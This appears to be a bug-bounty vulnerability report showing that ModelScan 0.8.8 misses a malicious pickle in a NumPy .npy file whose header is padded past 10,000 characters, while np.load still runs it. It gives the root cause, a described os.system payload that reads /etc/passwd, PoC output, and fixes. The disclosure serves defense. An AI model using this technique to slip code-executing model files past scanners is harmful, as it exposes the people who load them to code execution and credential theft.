YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
- ModelScan bypass: an oversized NumPy
.npyheader (scan-vs-load divergence) hides an object-array pickle, giving code execution onnp.loadwhile ModelScan reports 0 issues
ModelScan bypass: an oversized NumPy .npy header (scan-vs-load divergence) hides an object-array pickle, giving code execution on np.load while ModelScan reports 0 issues
Program: huntr β AI/ML Model File Formats (beta)
Target (dropdown): NumPy (.npy)
Affected tool: protectai/modelscan v0.8.8 (latest on PyPI) β modelscan.scanners.NumpyUnsafeOpScan / modelscan/tools/picklescanner.py::scan_numpy
Affected NumPy range for the divergence: NumPy 1.24.3 β 2.0.x (the versions modelscan targets; modelscan==0.8.8 pins only numpy>=1.24.3). See "NumPy version note" for >=2.1.
Class: Scanner bypass via scan-vs-load parser divergence -> arbitrary code execution (and arbitrary file read) on model load.
Severity (honest): High. Maps to the NumPy .npy dropdown tier (up to $1,500). It is a true detection bypass of a CRITICAL-rated payload, but it is not a fully silent "green check" β see "Honest severity framing".
Status: CONFIRMED β re-verified locally on modelscan 0.8.8. Date: 2026-06-15
Summary
ModelScan inspects a NumPy .npy file for malicious pickle operators only after it parses the .npy header and confirms the array dtype is an object dtype (dtype.hasobject). It parses that header with NumPy's default header-size cap of max_header_size = 10000 characters.
NumPy's real loader, np.load(..., allow_pickle=True), parses the same header with max_header_size = 2**64 β NumPy deliberately removes the cap on the load path because "the file is by definition trusted when allow_pickle is passed".
This asymmetry is exploitable. If an attacker pads the .npy header past 10000 characters:
- ModelScan's scan path raises
ValueError("Header info length ... is large ...")before it ever checks the dtype, so it never disassembles the trailing pickle. ModelScan marks the file SKIPPED (SCAN_NOT_SUPPORTED), records a non-fatal scanner error, and reportstotal_issues = 0. - The loader path parses the oversized header without complaint, sees the object dtype, and runs
pickle.load(fp)-> arbitrary code execution.
The identical payload in a normal-size-header .npy is correctly caught by ModelScan as a CRITICAL os.system operator. Padding the header turns that CRITICAL detection into a 0-issue result, while the payload still fires on load. That divergence between what ModelScan parses and what NumPy loads is the vulnerability.
Root cause (exact locations in ModelScan + NumPy)
ModelScan β modelscan/tools/picklescanner.py, scan_numpy():
elif magic == np.lib.format.MAGIC_PREFIX:
# .npy file
version = np.lib.format.read_magic(stream) # line 230
np.lib.format._check_version(version) # line 231
_, _, dtype = np.lib.format._read_array_header(stream, version) # line 232 <-- DEFAULT cap = 10000
if dtype.hasobject: # line 234 <-- never reached for big header
return scan_pickle_bytes(model, settings, scan_name, True, stream.tell()) # line 235 (the actual pickle scan)
else:
return ScanResults([], [], [])
_read_array_header(stream, version) is called without a max_header_size argument, so it uses NumPy's default of 10000. For a header longer than that, this line raises ValueError, so control never reaches the dtype.hasobject check on line 234 and the trailing pickle is never inspected.
NumPy β load path uses an unbounded cap. np.load -> numpy.lib.format.read_array(fp, allow_pickle=True) calls the same header reader with max_header_size=2**64. From NumPy's own docs for read_array/load: "max_header_size ... is ignored when allow_pickle is passed, as the file is by definition trusted." Default max_header_size = 10000. So the loader parses what the scanner refuses to.
How the raised ValueError becomes total_issues = 0 β modelscan/modelscan.py::_scan_source (lines 173β219): the exception from scan_numpy is caught at line 175, appended to self._errors as a ModelScanScannerError, and the loop continues without marking the file scanned. Because no scanner scanned the file, lines 209β219 then add a SkipCategories.SCAN_NOT_SUPPORTED skip. Net summary: total_issues=0, total_scanned=0, total_skipped=1, errors=1.
So the security control's "did you find anything?" answer is 0, even though a CRITICAL operator is sitting in the file's pickle.
Proof of concept
The PoC builds two .npy files holding the same 1-element object array. The object's __reduce__ returns (os.system, ("<benign marker + /etc/passwd read>",)), so unpickling runs the command. NumPy stores an object array as pickle.dumps(ndarray) immediately after the header, so np.load(allow_pickle=True) unpickles it. The only difference between the two files is 15000 spaces of header padding.
baseline_small.npyβ header 57 chars -> expected: ModelScan DETECTS.attack_bigheader.npyβ header 15057 chars -> expected: ModelScan MISSES (0 issues),np.loadexecutes.
make_poc.py regenerates both files; reproduce.py runs the full two-part assertion below.
(a) ModelScan β baseline detected, attack missed (captured verbatim, modelscan 0.8.8)
[baseline] total_issues=1 total_scanned=1 total_skipped=0 errors=0
ISSUE: severity=CRITICAL operator=posix.system # 'nt.system' when scanned on Windows
[attack] total_issues=0 total_scanned=0 total_skipped=1 errors=1
ERROR: Header info length (15057) is large and may not be safe to load securely.
SKIP : SCAN_NOT_SUPPORTED - Model Scan did not scan file
ModelScan flags the unpadded object array as a CRITICAL os.system; the byte-for-byte identical payload with a padded header produces 0 issues.
(b) The NumPy divergence, demonstrated directly (no ModelScan involved)
reproduce.py STEP 0 calls NumPy's own header reader on both code paths:
scan-path default max_header_size : 10000
normal (57 chars) scan-path=PARSED loader-path=PARSED
oversized (15057 chars) scan-path=RAISED ValueError: Header ... loader-path=PARSED
The scan-time cap (10000) rejects the oversized header; the load-time cap (2**64) accepts it. This is the root divergence, verifiable without ModelScan at all.
(c) The loader executes the payload
np.load(attack_bigheader.npy, allow_pickle=True) ...
np.load returned repr : array([0], dtype=object)
RCE marker written : True -> code-exec # /tmp/modelscan_npy_pwned.txt
arbitrary file read : True (... bytes from /etc/passwd) # /tmp/modelscan_npy_file_read.txt
(Confirmed on the test host with a portable payload: np.load ran os.system, wrote the marker file code-exec, and β on Linux β copies /etc/passwd to a proof file. The returned array element is the command's exit status, confirming os.system executed during unpickling.)
Two-part assertion satisfied: ModelScan reports total_issues = 0 for attack_bigheader.npy (does not report the CRITICAL operator it catches at normal size), while np.load(..., allow_pickle=True) of that same file executes attacker code and reads a host file.
Impact
Threat model is the standard, ModelScan-endorsed "scan untrusted models before you load them" workflow: a victim downloads a .npy (e.g. from the Hub or a shared artifact store), runs modelscan -p model.npy, sees 0 issues, and then loads it with np.load(path, allow_pickle=True) (or any library that does so internally). Result on the victim host:
- Arbitrary code execution at load time (the
os.systempayload β replace with any command for a reverse shell, credential theft, persistence). - Arbitrary file read / exfiltration as a sub-case (the PoC reads
/etc/passwd; the same primitive reads cloud creds, SSH keys, tokens).
This is exactly the impact class ModelScan exists to prevent, and it is the same CRITICAL it correctly flags for the un-padded file β achieved here past the scanner.
Honest severity framing (what "bypass" does and does not mean)
I want to be precise for the triager: ModelScan does not print a reassuring green "0 issues β file scanned safe". For the attack file it prints total_issues = 0 and marks the file skipped (SCAN_NOT_SUPPORTED) and raises a non-fatal scanner error, and the CLI exits non-zero (exit code 2/3, not 0). So the real-world severity depends on how the consuming pipeline interprets the result:
- Pipelines that gate on
total_issues == 0(a very common integration β "block if any issues, else proceed") treat this as a PASS and go on tonp.load-> full RCE. For these, this is a complete detection bypass of a CRITICAL payload. - Pipelines that fail-closed on skips/errors / non-zero exit are not bypassed; for them the impact degrades to a denial-of-scan (the malicious file is never assessed). Still a security-relevant gap (a hostile file evades inspection), but not silent RCE.
I am claiming the former, with the explicit caveat above β not a silent green check. The fix (below) is the same regardless of which interpretation a given user has.
Honest dup note (nearest prior art and why this is distinct)
Nearest public prior art is CVE-2025-46417 (SecDim / Sorin Boia, 2025) β "Bypassing AI Model Scanners and Exfiltrate Sensitive Data". That issue is in picklescan (fixed in picklescan 0.0.25), and its root cause is that the scanner did not follow the pickle embedded inside a NumPy object array at all β i.e. a "scanner ignores object-array pickles" coverage gap. The payload is a numpy object array whose pickle does an SSL/DNS exfil.
This finding is distinct on both tool and root cause:
- Different tool: this is ModelScan, not picklescan. ModelScan does inspect the object-array pickle β
scan_numpyexplicitly checksdtype.hasobjectand then callsscan_pickle_bytes(and it correctly catches the un-padded version as CRITICAL, as shown above). So the picklescan "doesn't look inside object arrays" gap does not apply. - Different root cause: the bypass here is not "the scanner ignores the pickle". It is a parser/format desync: ModelScan reads the
.npyheader withmax_header_size=10000while NumPy's loader reads it with2**64. An oversized header makes the scanner's parse fail before the dtype check, so the (otherwise-working) object-array pickle scan never runs. The exploit primitive is the header field, not the pickle contents.
Generic NumPy/pickle deserialization-RCE (CVE-2019-6446, the allow_pickle lineage) is also not this: that is about whether pickles run, and is well known. This finding is specifically about ModelScan failing to see a payload it is otherwise designed to catch, because of the header-size cap mismatch. I did not find this .npy header-size scan-vs-load divergence in ModelScan documented publicly.
(There is additionally a separate, version-specific defect: on NumPy >=2.1 the private symbols ModelScan imports β _check_version, _read_array_header β were relocated to numpy.lib._format_impl, so ModelScan's .npy scanner raises AttributeError and cannot scan any .npy at all on a fresh pip install modelscan. That is a different bug; this report is about the header-size divergence on the NumPy versions ModelScan targets. See the note in reproduce.py and README.)
Remediation
Make ModelScan's scan path parse exactly what the loader will parse:
- Parse the header with the same (unbounded) cap NumPy's loader uses. In
scan_numpy, callnp.lib.format._read_array_header(stream, version, max_header_size=2**64)so an oversized header can never prevent the dtype check. The header is being read only to learn the dtype, not loaded as data, so a large header is not itself dangerous here β it must not be allowed to skip the pickle scan. - Fail closed on parse errors for known model formats. A
.npywhose magic matched but whose header could not be parsed under the default cap should be treated as suspicious / unscannable-but-loadable, not as a benign skip that still yieldstotal_issues = 0. At minimum, any object-dtype.npythat cannot be fully header-parsed should be reported as an issue (or the CLI/integration contract should make "skipped/errored" block by default), so a "scan clean -> load" pipeline cannot proceed. - Defense in depth: if the header (under the safe cap) reports an object dtype, always scan the trailing pickle regardless of header-size anomalies; and document that
total_issues == 0is not a safe gate unlessskipped == 0anderrors == 0.
Environment / reproduction
protectai/modelscan0.8.8 (latest),numpy2.4.6 test host (see NumPy version note: the divergence is native on numpy 1.24.3β2.0.x; on >=2.1reproduce.pyre-binds the two private symbols ModelScan imports so the scanner runs as it does on its target NumPy β STEP 0 proves the divergence against NumPy directly, with no shim).- Files in this package:
report.md,README.md,reproduce.py(one-command end-to-end),make_poc.py(regenerates artifacts),baseline_small.npy,attack_bigheader.npy,scan_report.json(ModelScan JSON report for the attack file). - Run:
python reproduce.py-> prints the scanner numbers for both files, the NumPy divergence table, and the loader impact, then a VERDICT.
References
- ModelScan
scan_numpy(header parse +dtype.hasobjectgate): https://github.com/protectai/modelscan/blob/main/modelscan/tools/picklescanner.py - ModelScan scan-result/skip/error aggregation: https://github.com/protectai/modelscan/blob/main/modelscan/modelscan.py
- NumPy
read_array/load(max_header_sizedefault 10000; ignored whenallow_pickle=True): https://numpy.org/doc/stable/reference/generated/numpy.lib.format.read_array.html and https://numpy.org/doc/stable/reference/generated/numpy.load.html - Nearest prior art β CVE-2025-46417 (picklescan object-array bypass; different tool and root cause): https://secdim.com/blog/post/cve-2025-46417-bypassing-ai-model-scanners-and-exfiltrate-sensitive-data-15594/ and https://nvd.nist.gov/vuln/detail/CVE-2025-46417
- Background β CVE-2019-6446 (NumPy
allow_pickleRCE lineage): https://nvd.nist.gov/vuln/detail/CVE-2019-6446